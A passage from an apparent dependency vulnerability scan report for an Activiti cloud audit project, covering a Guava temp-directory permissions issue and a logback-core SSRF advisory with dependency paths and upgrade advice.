File child = new File(guavaTempDir, "guava-child.txt");
child.createNewFile();
runLS(guavaTempDir, child); // Prints the file permissions -> -rw-r--r--
For Android developers, choosing a temporary directory API provided by Android is recommended, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.
Remediation
There is no fix for com.google.guava:guava. However, in version 30.0 and above, the vulnerable functionality has been deprecated. In oder to mitigate this vulnerability, upgrade to version 30.0 or higher and ensure your dependencies don't use the createTempDir or createTempFile methods.
References
low severity
- Vulnerable module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Overview
ch.qos.logback:logback-core is a logback-core module.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through the SaxEventRecorder process. An attacker can forge requests by compromising logback configuration files in XML.
Remediation
Upgrade ch.qos.logback:logback-core to version 1.3.15, 1.5.13 or higher.